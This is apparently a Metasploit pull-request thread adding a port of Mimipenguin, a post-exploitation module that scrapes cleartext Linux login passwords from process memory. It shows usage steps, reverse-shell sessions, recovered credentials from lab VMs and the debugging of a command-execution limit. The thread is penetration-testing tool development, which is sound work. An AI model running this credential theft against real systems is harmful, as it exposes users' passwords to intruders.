Add Mimipenguin

[space-r7]

Description

This adds a port of Mimipenguin to Metasploit. Relying on mem_search() and mem_read() (rapid7/mettle#232), this searches the memory regions of various processes for needles that are found near passwords in cleartext. Using the locations for all of the needles found, this will search the nearby regions for possible passwords.

Verification

• Get a meterpreter session on a Linux-based target (with root privileges)
• Do: use post/linux/gather/mimipenguin
• Do: set session <sess_no>
• Do: run
• You should get credentials for the vulnerable services installed

Scenarios

msf6 post(linux/gather/mimipenguin) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Checking for matches in process gnome-keyring-daemon
[*] Checking for matches in process gdm-password
[*] Checking for matches in process vsftpd
[*] Checking for matches in process sshd
[*] Checking for matches in process lightdm
[+] Found valid password 'password' for user 'space' in process 'gnome-keyring-daemon'!
[+] Found valid password 'liEZNNV3Rt' for user 'admin' in process 'gnome-keyring-daemon'!
[+] Found 2 valid credential(s)!
[*] Post module execution completed
msf6 post(linux/gather/mimipenguin) > sessions -i -1
[*] Starting interaction with 8...

meterpreter > sysinfo
Computer     : 192.168.140.169
OS           : Ubuntu 21.04 (Linux 5.11.0-49-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Notes

• Requires Mettle PR #232 to land first
• Passwords can still be found in cleartext on the latest versions of Ubuntu, Debian, etc., but they use yescrypt as the default hashing algorithm, which I haven't found support for in the gems that we use. Because of this, the module fails although it might still find the password in memory
• To retrieve a password in gnome-keyring-daemon, logging in through the GUI is required. For vsftpd, an active / logged in FTP session is required. ssh isn't very consistent, but it requires an active ssh session that has elevated privileges using sudo. I haven't been able to figure out what's needed beyond that yet.

[bcoles]

UnixCrypt hashing is performed on the Metasploit side, which may not be running on Linux. I'm not sure if it is relevant to this PR, but last time I attempted this (#10224) there were issues with OS-dependent crypt implementations. See: #10224 (comment)

I worked around this by performing hashing on the target host. This also had the added benefit of removing the requirement to send huge amounts of process memory data back to Metaspoit for processing. However, the implementation was unclean.

[space-r7]

I was originally using crypt() and ran into this problem as well. UnixCrypt was suggested as a replacement and has worked for everything except for yescrypt ( lacking support ). Might have to attempt testing unsupported hashes on the target though, thanks.

[bwatters-r7]

I'm having some trouble pulling creds on Ubuntu VMs.....

msf6 post(linux/gather/mimipenguin) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information              Connection
  --  ----  ----                   -----------              ----------
  3         meterpreter x64/linux  root @ ubuntu16.04.1x64  10.5.135.101:4567 -> 10.5.132.110:60788 (10.5.132.110)
  5         meterpreter x64/linux  root @ 10.5.134.100      10.5.135.101:4567 -> 10.5.134.100:47250 (10.5.134.100)
  6         meterpreter x64/linux  root @ 10.5.132.108      10.5.135.101:4567 -> 10.5.132.108:37184 (10.5.132.108)

msf6 post(linux/gather/mimipenguin) > sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 3 (10.5.132.110)
Computer     : ubuntu16.04.1x64
OS           : Ubuntu 16.04 (Linux 4.4.0-31-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
[*] Running 'sysinfo' on meterpreter session 5 (10.5.134.100)
Computer     : 10.5.134.100
OS           : Ubuntu 20.04 (Linux 5.13.0-37-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
[*] Running 'sysinfo' on meterpreter session 6 (10.5.132.108)
Computer     : 10.5.132.108
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
msf6 post(linux/gather/mimipenguin) > set session 3
session => 3
msf6 post(linux/gather/mimipenguin) > run

[*] Storing shadow file...
[*] Checking for matches in process gnome-keyring-daemon
[*] Searching PID 4280...
[*] Choosing memory regions to search
[*] Checking for matches in process gdm-password
[*] Choosing memory regions to search
[*] Checking for matches in process vsftpd
[*] Choosing memory regions to search
[*] Checking for matches in process sshd
[*] Choosing memory regions to search
[*] Checking for matches in process lightdm
[*] Searching PID 3549...
[*] Searching PID 4021...
[*] Choosing memory regions to search
[-] Post aborted due to failure: not-found: Failed to find any passwords
[*] Post module execution completed
msf6 post(linux/gather/mimipenguin) > set session 5
session => 5
msf6 post(linux/gather/mimipenguin) > run

[*] Storing shadow file...
[*] Checking for matches in process gnome-keyring-daemon
[*] Searching PID 1790...
[*] Choosing memory regions to search
[*] Checking for matches in process gdm-password
[*] Choosing memory regions to search
[*] Checking for matches in process vsftpd
[*] Choosing memory regions to search
[*] Checking for matches in process sshd
[*] Searching PID 11691...
[*] Searching PID 11774...
[*] Searching PID 11855...
[*] Choosing memory regions to search
[*] Checking for matches in process lightdm
[*] Choosing memory regions to search
[-] Post aborted due to failure: not-found: Failed to find any passwords
[*] Post module execution completed
msf6 post(linux/gather/mimipenguin) > set session 6
session => 6
msf6 post(linux/gather/mimipenguin) > run

[*] Storing shadow file...
[*] Checking for matches in process gnome-keyring-daemon
[*] Searching PID 1391...
[*] Choosing memory regions to search
[*] Checking for matches in process gdm-password
[*] Choosing memory regions to search
[*] Checking for matches in process vsftpd
[*] Choosing memory regions to search
[*] Checking for matches in process sshd
[*] Choosing memory regions to search
[*] Checking for matches in process lightdm
[*] Choosing memory regions to search
[-] Post aborted due to failure: not-found: Failed to find any passwords
[*] Post module execution completed
msf6 post(linux/gather/mimipenguin) > 

All these were logged into recently and one is running openssh-server with an active connection. Am I missing something? I'd expected the gnome-keyring-daemon to be vulnerable. Is there a setting I need to adjust?

[space-r7]

The hash types weren't being matched properly, so I think that's why you weren't getting any results. Sorry about that! Submitted a fix and ran some tests:

Ubuntu 18.04.1

msf6 post(linux/gather/mimipenguin) > rerun
[*] Reloading module...

[*] Checking for matches in process gnome-keyring-daemon
[*] Checking for matches in process gdm-password
[*] Checking for matches in process vsftpd
[*] Checking for matches in process sshd
[*] Checking for matches in process lightdm
[+] Found 1 valid credential(s)!

Credentials
===========

  Process Name          Username  Password
  ------------          --------  --------
  gnome-keyring-daemon  msfuser   v3Mpassword

[*] Credentials stored in /Users/space/.msf4/loot/20220829174930_default_192.168.140.141_mimipenguin.csv_645166.txt
[*] Post module execution completed

Ubuntu 16.04.1 x64

meterpreter > sysinfo
Computer     : 192.168.140.139
OS           : Ubuntu 16.04 (Linux 4.4.0-31-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > previous
msf6 post(linux/gather/mimipenguin) > set session 2
session => 2
msf6 post(linux/gather/mimipenguin) > run

[*] Checking for matches in process gnome-keyring-daemon
[*] Checking for matches in process gdm-password
[*] Checking for matches in process vsftpd
[*] Checking for matches in process sshd
[*] Checking for matches in process lightdm
[+] Found 1 valid credential(s)!

Credentials
===========

  Process Name  Username     Password
  ------------  --------     --------
  lightdm       penguintest  P3nguinP@ssword

[*] Credentials stored in /Users/space/.msf4/loot/20220829180307_default_192.168.140.139_mimipenguin.csv_776092.txt
[*] Post module execution completed

[bwatters-r7]

Ohhh..... I have managed to get a reproducible crash across 2 systems. It is a little early, but both systems are running XFCE as the graphical environment, and both fail the same way:

msf6 post(linux/gather/mimipenguin) > sessions -i 11
[*] Starting interaction with 11...

meterpreter > sysinfo
Computer     : 10.5.134.167
OS           : Ubuntu 22.04 (Linux 5.15.0-46-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > background
[*] Backgrounding session 11...
msf6 post(linux/gather/mimipenguin) > run

[*] Storing shadow file...
[*] Checking for matches in process gnome-keyring-daemon
[*] Searching PID 1005...
[*] Choosing memory regions to search
[*] Checking for matches in process gdm-password
[*] Choosing memory regions to search
[*] Checking for matches in process vsftpd
[*] Choosing memory regions to search
[*] Checking for matches in process sshd
[*] Choosing memory regions to search
[*] Checking for matches in process lightdm
[*] Searching PID 720...
[*] Searching PID 969...
[*] Choosing memory regions to search
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: 1
[-] Call stack:
[-]   /home/tmoose/rapid7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:176:in `execute'
[-]   /home/tmoose/rapid7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:199:in `capture_output'
[-]   /home/tmoose/rapid7/metasploit-framework/lib/msf/core/post/common.rb:119:in `cmd_exec'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:280:in `block (2 levels) in check_for_valid_passwords'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:254:in `each'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:254:in `block in check_for_valid_passwords'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:253:in `each'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:253:in `check_for_valid_passwords'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:363:in `block (2 levels) in run'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:354:in `each'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:354:in `block in run'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:342:in `each'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:342:in `run'
[*] Post module execution completed
msf6 post(linux/gather/mimipenguin) > sessions -i 11
[*] Starting interaction with 11...

meterpreter > sysinfo
Computer     : 10.5.134.167
OS           : Ubuntu 22.04 (Linux 5.15.0-46-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > shell
[-] stdapi_sys_process_execute: Operation failed: 1

It looks like the cmd_exec call is crashing, and not coming back, but the session remains. I can run anything that has a direct link to the system calls, but nothing that needs the execute command?

meterpreter > shell
[-] stdapi_sys_process_execute: Operation failed: 1
meterpreter > ls -l
Listing: /home/msfuser
======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  0     fil   2022-08-30 18:37:08 -0500  .ICEauthority
100600/rw-------  57    fil   2022-08-30 18:37:07 -0500  .Xauthority
100644/rw-r--r--  1600  fil   2022-08-30 11:57:38 -0500  .Xdefaults
100644/rw-r--r--  220   fil   2022-08-30 11:57:38 -0500  .bash_logout
100644/rw-r--r--  3771  fil   2022-08-30 11:57:38 -0500  .bashrc
040700/rwx------  4096  dir   2022-08-30 18:37:10 -0500  .cache
040755/rwxr-xr-x  4096  dir   2022-08-30 18:37:09 -0500  .config
100644/rw-r--r--  26    fil   2022-08-30 18:37:07 -0500  .dmrc
040775/rwxrwxr-x  4096  dir   2022-08-30 18:37:08 -0500  .local
100644/rw-r--r--  807   fil   2022-08-30 11:57:38 -0500  .profile
100644/rw-r--r--  0     fil   2022-08-30 12:10:20 -0500  .sudo_as_admin_successful
100644/rw-r--r--  14    fil   2022-08-30 11:57:38 -0500  .xscreensaver
100600/rw-------  8141  fil   2022-08-30 12:07:16 -0500  .xsession-errors
040755/rwxr-xr-x  4096  dir   2022-08-30 18:37:08 -0500  Desktop
040755/rwxr-xr-x  4096  dir   2022-08-30 18:37:08 -0500  Documents
040755/rwxr-xr-x  4096  dir   2022-08-30 18:37:08 -0500  Downloads

The two systems I've seen this on are:
xubuntu
http://mirror.us.leaseweb.net/ubuntu-cdimage/xubuntu/releases/22.04/release/
mxlinux (with XFCE)
https://sourceforge.net/projects/mx-linux/files/Final/Xfce/MX-21.2_x64.iso/download

mirror.us.leaseweb.netmirror.us.leaseweb.net
mirror.wdc1.us.leaseweb.net | powered by Leaseweb
Leaseweb public mirror archive

[space-r7]

I was able to reproduce the crash on a Xubuntu 22.04 vm via the module, and I can get a crash on both Xubuntu and Ubuntu 18.04 via a test module. When testing Mimipenguin, Xubuntu specifically is pulling more results from memory versus other versions of Linux, thus requiring more cmd_exec() calls, resulting in the crash. I modified the post/test/cmd_exec module echo test case to call cmd_exec() and print the number of calls before a crash. You'll see that on both Xubuntu and Ubuntu that the number of successful calls is the same:

Test output

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Sending stage (3045348 bytes) to 192.168.140.152
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.152:56710) at 2022-08-31 13:46:16 -0500

meterpreter > sysinfo
Computer     : 192.168.140.152
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Sending stage (3045348 bytes) to 192.168.140.149
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.149:33450) at 2022-08-31 13:46:27 -0500

meterpreter > sysinfo
Computer     : 192.168.140.149
OS           : Ubuntu 22.04 (Linux 5.15.0-46-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > loadpath test/modules
Loaded 38 modules:
    14 auxiliary modules
    13 exploit modules
    11 post modules
msf6 exploit(multi/handler) > use post/test/cmd_exec
msf6 post(test/cmd_exec) > set session 1
session => 1
msf6 post(test/cmd_exec) > run

[*] Running against session 1
[*] Session type is meterpreter and platform is linux
[+] should return the result of echo
[+] should return the full response after sleeping
[+] should return the full response after sleeping
Echo #0
Echo #1
Echo #2
Echo #3
Echo #4
Echo #5
Echo #6
...
Echo #328
Echo #329
Echo #330
Echo #331
Echo #332
Echo #333
Echo #334
[-] FAILED: should return the result of echo 500 times
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the result of echo with single quotes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the result of echo with double quotes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the stderr output
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[*] Passed: 7; Failed: 0
[*] Post module execution completed
msf6 post(test/cmd_exec) > set session 2
session => 2
msf6 post(test/cmd_exec) > run

[*] Running against session 2
[*] Session type is meterpreter and platform is linux
[+] should return the result of echo
[+] should return the full response after sleeping
[+] should return the full response after sleeping
Echo #0
Echo #1
Echo #2
Echo #3
Echo #4
Echo #5
Echo #6
...
Echo #328
Echo #329
Echo #330
Echo #331
Echo #332
Echo #333
Echo #334
[-] FAILED: should return the result of echo 500 times
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the result of echo with single quotes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the result of echo with double quotes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the stderr output
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[*] Passed: 7; Failed: 0
[*] Post module execution completed

Diff of changes to cmd_exec test module

msf6 post(test/cmd_exec) > git diff test/modules/post/test/cmd_exec.rb
[*] exec: git diff test/modules/post/test/cmd_exec.rb

diff --git a/test/modules/post/test/cmd_exec.rb b/test/modules/post/test/cmd_exec.rb
index 1456f9b49b..45970b4c44 100644
--- a/test/modules/post/test/cmd_exec.rb
+++ b/test/modules/post/test/cmd_exec.rb
@@ -51,10 +51,11 @@ class MetasploitModule < Msf::Post
         output.delete("\r") == "#{test_string}\n#{test_string2}"
       end
 
-      it "should return the result of echo 10 times" do
-        10.times do
+      it "should return the result of echo 500 times" do
+        500.times do |i|
           test_string = Rex::Text.rand_text_alpha(4)
           output = cmd_exec("echo #{test_string}")
+          puts "Echo ##{i}"
           return false unless output == test_string
         end
         true

It looks to me that there is a hard limit on how many commands we can run. Any ideas for a potential workaround? I've added a small bit of code to the Mimipenguin module that filters out results that are most likely library paths.

[bwatters-r7]

I was digging into this this morning and was hoping to bring it up during module hacking. That there's a hard limit to the number of times we can call cmd_exec smells like a channel or process counter that's limited. I'm curious if anyone knows the likely location of such a thing.

[bwatters-r7]

Edit: I'm not seeing this be an issue on Windows Meterpreter. I'm guessing this might live in the Mettle code.

I guess a quick test would be to run the modified cmd_exec tests on a windows meterpreter host; it might tell us if the limit is framework-based or payload-based....

[bwatters-r7]

I'm not seeing anything useful in the debug on the target side:

On the framework side with the TLV output, I'm seeing a boatload of close channel requests, often for the same channels over and over again. I'm not sure if this is an indication that the channels are never closed, or if they're reopened immediately....

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-284">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=284>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-285">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=285>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-286">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=286>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-287">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=287>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-288">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=288>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-289">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=289>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-290">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=290>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-291">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=291>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-292">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=292>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-293">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=293>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-294">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=294>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-295">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=295>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-296">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=296>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-297">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=297>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-298">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=298>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-299">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=299>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-300">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=300>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-301">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=301>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-302">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=302>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-303">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=303>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-304">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=304>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-305">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=305>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-306">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=306>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-307">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=307>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
